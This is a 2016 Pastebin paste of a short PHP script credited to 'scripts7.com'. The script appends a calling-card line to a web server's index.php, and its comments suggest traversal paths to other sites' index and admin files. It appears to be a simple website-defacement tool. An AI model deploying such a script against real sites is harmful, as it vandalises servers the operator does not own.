scripts7com

Change index V.1 - scripts7.com

Jan 19th, 2016
141
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.63 KB | None | 0 0
  1.  <?php
  2. #// scripts7.com
  3. #// twitter.com/scripts7com
  4. #// Change index.php to whatever you want V.1
  5. #// you can do :
  6. #// 1 : ../../index.php
  7. #// 2 : /home/user/puclib_html/admin/
  8. #// 3 : /home/user/public_html/index.php
  9. #// BUT MUST BE 755 or 777 otherwise won't work !!!!
  10. #// if there is no file index.php it's gonna make make you one don't worry ;)
  11. $t = 'index.php';
  12. $x = file_get_contents($t);
  13. # .= means add over and over if you don't want to do over and over, change .= to = but leave it .= better
  14. # type or add whatever between "" to whatever you want
  15. $x .= " Scripts7.com Always and forever \n";
  16. file_put_contents($t, $x);
  17. ?>
Add Comment
Please, Sign In to add comment